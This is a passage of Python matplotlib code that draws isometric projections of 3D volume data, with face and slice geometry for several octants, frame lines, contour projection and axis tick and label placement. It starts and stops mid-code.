hx)\n\n # angle of axis [-180,180]\n axis_angle = np.arctan2(p2y - p1y, p2x - p1x + 1.0e-10) * 180.0 / np.pi\n\n # angle of tick label\n if ticklabel_orient == 'positive':\n ticklabel_angle = axis_angle\n if ticklabel_orient == 'negative':\n ticklabel_angle = axis_angle - 180.0\n if ticklabel_orient == 'counterclock':\n ticklabel_angle = axis_angle + 90.0\n if ticklabel_orient == 'clock':\n ticklabel_angle = axis_angle - 90.0\n\n # maximum tick label length\n ticklabellen = [0 for i in range(0, len(tick_location))]\n for i in range(0, len(tick_location)):\n ticklines = tick_label[i].split('\\n')\n if ticklabel_orient == 'positive' or ticklabel_orient == 'negative':\n ticklabellen[i] = len(ticklines) * tick_size * ipp\n if ticklabel_orient == 'counterclock' or ticklabel_orient == 'clock':\n ticklabellen[i] = 0.6 * max([len(j) for j in ticklines]) * tick_size * ipp\n maxlen = max(ticklabellen)\n\n # tick label alignment\n pad = ticklen + 0.1\n if ticklabel_orient == 'positive' or ticklabel_orient == 'negative':\n ha = 'center'\n va = 'center'\n pad = pad + 0.5 * tick_size * ipp\n if ticklabel_orient == 'clock':\n if tick_orient == 'clock':\n ha = 'left'\n va = 'center'\n if tick_orient == 'counterclock':\n ha = 'right'\n va = 'center'\n if ticklabel_orient == 'counterclock':\n if tick_orient == 'clock':\n ha = 'right'\n va = 'center'\n if tick_orient == 'counterclock':\n ha = 'left'\n va = 'center'\n\n # tick labels\n for i in range(0, len(tick_location)):\n epx = tx[i] + txx[i] / sqrt(txx[i]**2 + tyy[i]**2) * pad\n epy = ty[i] + tyy[i] / sqrt(txx[i]**2 + tyy[i]**2) * pad\n ax.text(epx,\n epy,\n tick_label[i],\n ha=ha,\n va=va,\n rotation=ticklabel_angle,\n fontproperties=font,\n size=tick_size)\n\n # angle of axis label\n if label_orient == 'positive':\n label_angle = axis_angle\n if label_orient == 'negative':\n label_angle = axis_angle - 180.0\n if label_orient == 'counterclock':\n label_angle = axis_angle + 90.0\n if label_orient == 'clock':\n label_angle = axis_angle - 90.0\n\n # axis label alignment\n pad = ticklen + 0.05 + maxlen + 0.1\n if label_orient == 'positive' or label_orient == 'negative':\n ha = 'center'\n va = 'center'\n pad = pad + 0.6 * label_size * ipp + label_pad\n if label_orient == 'clock':\n ha = 'left'\n va = 'center'\n pad = pad + label_pad\n if label_orient == 'counterclock':\n ha = 'right'\n va = 'center'\n pad = pad + label_pad\n\n # maximum axis label length\n labellines = label.split('\\n')\n if ticklabel_orient == 'positive' or ticklabel_orient == 'negative':\n labellen = len(labellines) * label_size * ipp\n if ticklabel_orient == 'counterclock' or ticklabel_orient == 'clock':\n labellen = 0.6 * max([len(i) for i in labellines]) * label_size * ipp\n\n # axis label position\n labelx = hx + hx2 / sqrt(hx2**2 + hy2**2) * pad\n labely = hy + hy2 / sqrt(hx2**2 + hy2**2) * pad\n if label is not None:\n ax.text(labelx,\n labely,\n label,\n ha=ha,\n va=va,\n rotation=label_angle,\n fontproperties=font,\n size=label_size)\n\n # minor tick locations\n # projection of ticks to target position\n tx = [p1x + i * (p2x - p1x) / axislen for i in minor_tick_location]\n ty = [p1y + i * (p2y - p1y) / axislen for i in minor_tick_location]\n\n if tick_orient == 'counterclock':\n # outward pointing -- 90 degree counterclockwise\n tx2 = -(p2y - ty)\n ty2 = p2x - tx\n\n if tick_orient == 'clock':\n # inward pointing -- 90 degree clockwise\n tx2 = p2y - ty\n ty2 = -(p2x - tx)\n\n ticklen = tick_minor_len * ipp\n for i in range(0, len(minor_tick_location)):\n epx = tx[i] + tx2[i] / 
sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n epy = ty[i] + ty2[i] / sqrt(tx2[i]**2 + ty2[i]**2) * ticklen\n tx2[i] = epx\n ty2[i] = epy\n\n # form lines\n minortick = []\n e1 = list(zip(tx, ty))\n e2 = list(zip(tx2, ty2))\n for i in range(0, len(minor_tick_location)):\n minortick.append([e1[i], e2[i]])\n\n minortick = LineCollection(minortick, linewidths=tick_minor_width, colors='k')\n ax.add_collection(minortick)\n\n\n## color converter\ndef cc(arg):\n return colorConverter.to_rgba(arg)\n\n\n## compose volume\nif octant_1:\n\n angle1 = angle1\n angles = [angle1, angle2]\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection\n #\n #\n # 8 *------------------------* 6\n # /. /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size2)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . /\n # | #............# /\n # | | /\n # | |/ ) angle\n # *------------------------* ----\n # 1 3 (size3)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size3, 0, angles)\n p2x, p2y = isometric_projection(0, size3, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size2, 0, 0, angles)\n p6x, p6y = isometric_projection(size2, 0, size1, angles)\n p7x, p7y = isometric_projection(size2, size3, 0, angles)\n p8x, p8y = isometric_projection(size2, size3, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = size3 - (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl3, sl1, angles)\n q2x, q2y = isometric_projection(0, sl3, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl2, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl2, 0, size1, angles)\n q7x, q7y = isometric_projection(sl2, sl3, sl1, angles)\n q8x, q8y = isometric_projection(sl2, sl3, size1, angles)\n\n # face 13 coordinates\n face13x = [p2x, p1x, p3x, p4x]\n face13y = [p2y, p1y, p3y, p4y]\n\n # face 23 coordinates\n face23x = [p2x, p8x, p6x, p4x]\n face23y = [p2y, p8y, p6y, p4y]\n\n # face 12 coordinates\n face12x = [p4x, p3x, p5x, p6x]\n face12y = [p4y, p3y, p5y, p6y]\n\n # slice 13 coordinates\n slice13x = [q8x, q7x, q5x, q6x]\n slice13y = [q8y, q7y, q5y, q6y]\n\n # slice 23 coordinates\n slice23x = [q1x, q7x, q5x, q3x]\n slice23y = [q1y, q7y, q5y, q3y]\n\n # slice 12 coordinates\n slice12x = [q2x, q1x, q7x, q8x]\n slice12y = [q2y, q1y, q7y, q8y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = 
LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p1x, p1y), (p2x, p2y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q1x, q1y), (q2x, q2y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p5x, p5y), (p6x, p6y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q5x, q5y), (q6x, q6y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p3x, p3y)], [(p4x, p4y), (p6x, p6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\nif octant_2:\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection\n #\n #\n # 8 *------------------------* 6\n # /. face 23 /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size3)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . / face 13\n # | #............# /\n # | | /\n # | face 12 |/ ) angle\n # *------------------------* ----\n # 1 3 (size2)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size2, 0, angles)\n p2x, p2y = isometric_projection(0, size2, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size3, 0, 0, angles)\n p6x, p6y = isometric_projection(size3, 0, size1, angles)\n p7x, p7y = isometric_projection(size3, size2, 0, angles)\n p8x, p8y = isometric_projection(size3, size2, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl2, sl1, angles)\n q2x, q2y = isometric_projection(0, sl2, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl3, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl3, 0, size1, angles)\n q7x, q7y = isometric_projection(sl3, sl2, sl1, angles)\n q8x, q8y = isometric_projection(sl3, sl2, size1, angles)\n\n # face 13 coordinates\n face13x = [p4x, p3x, p5x, p6x]\n face13y = [p4y, p3y, p5y, p6y]\n\n # face 23 coordinates\n face23x = [p4x, p2x, p8x, p6x]\n face23y = [p4y, p2y, p8y, p6y]\n\n # face 12 coordinates\n face12x = [p4x, p3x, p1x, p2x]\n face12y = [p4y, p3y, p1y, p2y]\n\n # slice 13 coordinates\n slice13x = [q2x, q1x, q7x, q8x]\n slice13y = [q2y, q1y, q7y, q8y]\n\n # slice 23 coordinates\n slice23x = [q3x, q1x, q7x, q5x]\n slice23y = [q3y, q1y, q7y, q5y]\n\n # slice 12 coordinates\n slice12x = [q6x, q5x, q7x, q8x]\n slice12y = [q6y, q5y, q7y, q8y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # 
frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p2x, p2y), (p1x, p1y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q2x, q2y), (q1x, q1y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p6x, p6y), (p5x, p5y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q6x, q6y), (q5x, q5y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p6x, p6y)], [(p4x, p4y), (p3x, p3y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\nif octant_3:\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection. \n #\n #\n # 8 *------------------------* 6\n # /. /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size2)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . /\n # | #............# /\n # | | /\n # | |/ ) angle\n # *------------------------* ----\n # 1 3 (size3)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size3, 0, angles)\n p2x, p2y = isometric_projection(0, size3, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size2, 0, 0, angles)\n p6x, p6y = isometric_projection(size2, 0, size1, angles)\n p7x, p7y = isometric_projection(size2, size3, 0, angles)\n p8x, p8y = isometric_projection(size2, size3, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = size2 - (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl3, sl1, angles)\n q2x, q2y = isometric_projection(0, sl3, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl2, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl2, 0, size1, angles)\n q7x, q7y = isometric_projection(sl2, sl3, sl1, angles)\n q8x, q8y = isometric_projection(sl2, sl3, size1, angles)\n\n # face 13 coordinates\n face13x = [p4x, p3x, p1x, p2x]\n face13y = [p4y, p3y, p1y, p2y]\n\n # face 23 coordinates\n face23x = [p6x, p4x, p2x, p8x]\n face23y = [p6y, p4y, p2y, p8y]\n\n # face 12 coordinates\n face12x = [p6x, p5x, p3x, 
p4x]\n face12y = [p6y, p5y, p3y, p4y]\n\n # slice 13 coordinates\n slice13x = [q6x, q5x, q7x, q8x]\n slice13y = [q6y, q5y, q7y, q8y]\n\n # slice 23 coordinates\n slice23x = [q5x, q3x, q1x, q7x]\n slice23y = [q5y, q3y, q1y, q7y]\n\n # slice 12 coordinates\n slice12x = [q8x, q7x, q1x, q2x]\n slice12y = [q8y, q7y, q1y, q2y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p1x, p1y), (p2x, p2y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q1x, q1y), (q2x, q2y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p5x, p5y), (p6x, p6y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q5x, q5y), (q6x, q6y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p6x, p6y)], [(p4x, p4y), (p3x, p3y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\nif octant_4:\n\n #\n # A sketch of cavalier projection. \n # The relative point positions also apply to isometric projection.\n #\n #\n # 8 *------------------------* 6\n # /. face 23 /|\n # / . / |\n # / . #............# |\n # / . .: : |\n # / . . : : |\n # 2 / *(7) . : (4) : * 5 (size3)\n # *-----------# #............# /\n # | size1 : . . /\n # | :. . 
/ face 13\n # | #............# /\n # | | /\n # | face 12 |/ ) angle\n # *------------------------* ----\n # 1 3 (size2)\n #\n\n # vertices positions for faces\n p1x, p1y = isometric_projection(0, size2, 0, angles)\n p2x, p2y = isometric_projection(0, size2, size1, angles)\n p3x, p3y = isometric_projection(0, 0, 0, angles)\n p4x, p4y = isometric_projection(0, 0, size1, angles)\n p5x, p5y = isometric_projection(size3, 0, 0, angles)\n p6x, p6y = isometric_projection(size3, 0, size1, angles)\n p7x, p7y = isometric_projection(size3, size2, 0, angles)\n p8x, p8y = isometric_projection(size3, size2, size1, angles)\n\n # set slice cut plane\n if x1end != x1beg:\n scale1 = size1 / (x1end - x1beg)\n else:\n scale1 = 1.0e2\n if x2end != x2beg:\n scale2 = size2 / (x2end - x2beg)\n else:\n scale2 = 1.0e2\n if x3end != x3beg:\n scale3 = size3 / (x3end - x3beg)\n else:\n scale3 = 1.0e2\n sl1 = size1 - (sl1 - x1beg) / ((n1end - n1beg - 1) * d1) * size1\n sl2 = size2 - (sl2 - x2beg) / ((n2end - n2beg - 1) * d2) * size2\n sl3 = size3 - (sl3 - x3beg) / ((n3end - n3beg - 1) * d3) * size3\n\n # vertices positions for slices\n q1x, q1y = isometric_projection(0, sl2, sl1, angles)\n q2x, q2y = isometric_projection(0, sl2, size1, angles)\n q3x, q3y = isometric_projection(0, 0, sl1, angles)\n q4x, q4y = isometric_projection(0, 0, size1, angles)\n q5x, q5y = isometric_projection(sl3, 0, sl1, angles)\n q6x, q6y = isometric_projection(sl3, 0, size1, angles)\n q7x, q7y = isometric_projection(sl3, sl2, sl1, angles)\n q8x, q8y = isometric_projection(sl3, sl2, size1, angles)\n\n # face 13 coordinates\n face13x = [p6x, p5x, p3x, p4x]\n face13y = [p6y, p5y, p3y, p4y]\n\n # face 23 coordinates\n face23x = [p8x, p6x, p4x, p2x]\n face23y = [p8y, p6y, p4y, p2y]\n\n # face 12 coordinates\n face12x = [p2x, p1x, p3x, p4x]\n face12y = [p2y, p1y, p3y, p4y]\n\n # slice 13 coordinates\n slice13x = [q8x, q7x, q1x, q2x]\n slice13y = [q8y, q7y, q1y, q2y]\n\n # slice 23 coordinates\n slice23x = [q7x, q5x, q3x, q1x]\n slice23y = [q7y, q5y, q3y, q1y]\n\n # slice 12 coordinates\n slice12x = [q8x, q7x, q5x, q6x]\n slice12y = [q8y, q7y, q5y, q6y]\n\n # axis limits\n xlim = [p1x - 0.01, p5x + 0.01]\n ylim = [p3y - 0.01, p8y + 0.01]\n\n # frames\n if args.frametop:\n topline = [[(p2x, p2y), (p8x, p8y), (p6x, p6y)]]\n topline = LineCollection(topline, color='k')\n topline2 = [[(q2x, q2y), (q8x, q8y), (q6x, q6y)]]\n topline2 = LineCollection(topline2, color='k')\n if args.framebottom:\n bottomline = [[(p1x, p1y), (p3x, p3y), (p5x, p5y)]]\n bottomline = LineCollection(bottomline, color='k')\n bottomline2 = [[(q1x, q1y), (q3x, q3y), (q5x, q5y)]]\n bottomline2 = LineCollection(bottomline2, color='k')\n if args.frameleft:\n leftline = [[(p2x, p2y), (p1x, p1y)]]\n leftline = LineCollection(leftline, color='k')\n leftline2 = [[(q2x, q2y), (q1x, q1y)]]\n leftline2 = LineCollection(leftline2, color='k')\n if args.frameright:\n rightline = [[(p6x, p6y), (p5x, p5y)]]\n rightline = LineCollection(rightline, color='k')\n rightline2 = [[(q6x, q6y), (q5x, q5y)]]\n rightline2 = LineCollection(rightline2, color='k')\n if args.centerframe:\n if takeslice:\n centerline = [[(p2x, p2y), (q2x, q2y)], [(p3x, p3y), (q3x, q3y)], [(p6x, p6y), (q6x, q6y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n else:\n centerline = [[(p4x, p4y), (p2x, p2y)], [(p4x, p4y), (p6x, p6y)], [(p4x, p4y), (p3x, p3y)]]\n centerline = LineCollection(centerline, color='k', zorder=1)\n centerline2 = [[(q7x, q7y), (q1x, q1y)], [(q7x, q7y), (q5x, q5y)], [(q7x, q7y), (q8x, 
q8y)]]\n centerline2 = LineCollection(centerline2, color='k', zorder=2, linestyle='dashed')\n\n## set colormap\nfrom module_colormap import set_colormap\ncolormap = set_colormap(args)\n\n## set clip\nfrom module_clip import *\ndata = np.concatenate((fdata12.flatten(), fdata13.flatten(), fdata23.flatten()))\nif args.slice1 is not None:\n data = np.concatenate((data, data23.flatten()))\nif args.slice2 is not None:\n data = np.concatenate((data, data13.flatten()))\nif args.slice3 is not None:\n data = np.concatenate((data, data12.flatten()))\ncmin, cmax = set_clip(args, data, 'fore', dmin, dmax)\nif args.norm == 'log':\n if cmin > np.floor(cmax) or cmax < np.ceil(cmin):\n print('error: values in dataset have same order of magnitude')\n exit()\n\n## plot the projection faces and slices\nangle1 = angle1\n\nfigheight = p8y - p3y\nfigwidth = max(p5x, p6x) - min(p1x, p2x)\n\nfig = plt.figure(figsize=(figwidth, figheight))\nax = fig.add_axes([0, 0, 1, 1])\n\nproject_contour(args, ax, fdata13, face13x, face13y, colormap, cmin, cmax, font, mask13)\nproject_contour(args, ax, fdata23, face23x, face23y, colormap, cmin, cmax, font, mask23)\nproject_contour(args, ax, fdata12, face12x, face12y, colormap, cmin, cmax, font, mask12)\n\nif args.frametop:\n ax.add_collection(topline)\nif args.framebottom:\n ax.add_collection(bottomline)\nif args.frameleft:\n ax.add_collection(leftline)\nif args.frameright:\n ax.add_collection(rightline)\nif args.centerframe:\n ax.add_collection(centerline)\n\nif args.slice1 is not None or args.slice2 is not None or args.slice3 is not None:\n\n project_contour(args, ax, data13, slice13x, slice13y, colormap, cmin, cmax, font)\n project_contour(args, ax, data23, slice23x, slice23y, colormap, cmin, cmax, font)\n project_contour(args, ax, data12, slice12x, slice12y, colormap, cmin, cmax, font)\n\n if args.frametop:\n ax.add_collection(topline2)\n if args.framebottom:\n ax.add_collection(bottomline2)\n if args.frameleft:\n ax.add_collection(leftline2)\n if args.frameright:\n ax.add_collection(rightline2)\n if args.centerframe:\n ax.add_collection(centerline2)\n\n## set ticks\n# major ticks style\ntick_major_length = float(args.tickmajorlen)\ntick_major_width = float(args.tickmajorwid)\n\n# minor ticks style\nif args.tickminorlen is None:\n tick_minor_length = 0.5 * tick_major_length\nelse:\n tick_minor_length = float(args.tickminorlen)\n\nif args.tickminorwid is None:\n tick_minor_width = 0.75 * tick_major_width\nelse:\n tick_minor_width = float(args.tickminorwid)\n\n# tick font size\nlabel_1_size = float(args.label1size)\nlabel_2_size = float(args.label2size)\nlabel_3_size = float(args.label3size)\n\nif args.tick1size is None:\n tick_1_size = label_1_size - 2\nelse:\n tick_1_size = float(args.tick1size)\n\nif args.tick2size is None:\n tick_2_size = label_2_size - 2\nelse:\n tick_2_size = float(args.tick2size)\n\nif args.tick3size is None:\n tick_3_size = label_3_size - 2\nelse:\n tick_3_size = float(args.tick3size)\n\nif octant_1:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, 
args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p2x, p2y, p8x, p8y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p3x, p3y, p5x, p5y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'positive', tick_2_size,\n args.label2, 'positive', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p8x, p8y, p6x, p6y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p1x, p1y, p3x, p3y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\nif octant_2:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'clock', 'counterclock', tick_1_size,\n args.label1, 'negative', label_1_size, float(args.label1pad), args.tick1format)\n\n if args.axis1loc == 'right' or args.axis1loc == 'both':\n project_axis(ax, p6x, p6y, p5x, p5y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, x1end, n1, d1, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size1, 'counterclock', 'counterclock', tick_1_size,\n args.label1, 'positive', label_1_size, float(args.label1pad), args.tick1format)\n\n # axis 2\n if args.axis2loc == 'top' or args.axis2loc == 'both':\n project_axis(ax, p6x, p6y, p8x, p8y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'clock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n if args.axis2loc == 'bottom' or args.axis2loc == 'both':\n project_axis(ax, p3x, p3y, p1x, p1y, args.ticks2, args.tick2beg, args.tick2end, args.tick2d,\n args.mtick2, x2beg, x2end, n2, d2, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size2, 'counterclock', 'negative', tick_2_size,\n args.label2, 'negative', label_2_size, float(args.label2pad), args.tick2format)\n\n # axis 3\n if 
args.axis3loc == 'top' or args.axis3loc == 'both':\n project_axis(ax, p2x, p2y, p8x, p8y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'counterclock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\n if args.axis3loc == 'bottom' or args.axis3loc == 'both':\n project_axis(ax, p3x, p3y, p5x, p5y, args.ticks3, args.tick3beg, args.tick3end, args.tick3d,\n args.mtick3, x3beg, x3end, n3, d3, font, tick_major_length, tick_major_width,\n tick_minor_length, tick_minor_width, size3, 'clock', 'positive', tick_3_size,\n args.label3, 'positive', label_3_size, float(args.label3pad), args.tick3format)\n\nif octant_3:\n\n # axis 1\n if args.axis1loc == 'left' or args.axis1loc == 'both':\n project_axis(ax, p2x, p2y, p1x, p1y, args.ticks1, args.tick1beg, args.tick1end, args.tick1d,\n args.mtick1, x1beg, 